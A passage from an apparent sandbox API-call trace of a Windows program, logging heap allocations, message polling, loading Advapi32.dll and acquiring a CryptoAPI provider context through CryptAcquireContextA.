lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0211.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.928] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0211.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0211.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0211.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0211.928] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0211.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0211.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0211.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0211.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0211.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0211.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0211.929] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0211.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0211.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0211.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0211.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0211.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0211.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0211.931] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.931] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0211.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.931] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0211.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0211.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0211.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0211.932] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0211.933] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0211.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.933] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0211.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0211.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0211.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0211.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0211.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0211.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0211.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0211.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0211.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0211.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0211.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0211.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0211.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0211.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0211.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0211.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0211.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0211.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.935] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0211.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0211.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0211.936] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0211.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0211.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0211.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0211.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0211.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69928 [0211.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0211.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0211.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0211.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0211.936] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0211.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0211.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0211.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0211.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0211.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0211.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0211.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0211.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0211.937] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0211.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0211.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0211.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0211.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0211.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0211.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0211.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0211.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0211.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0211.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0211.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.941] HeapFree (in: 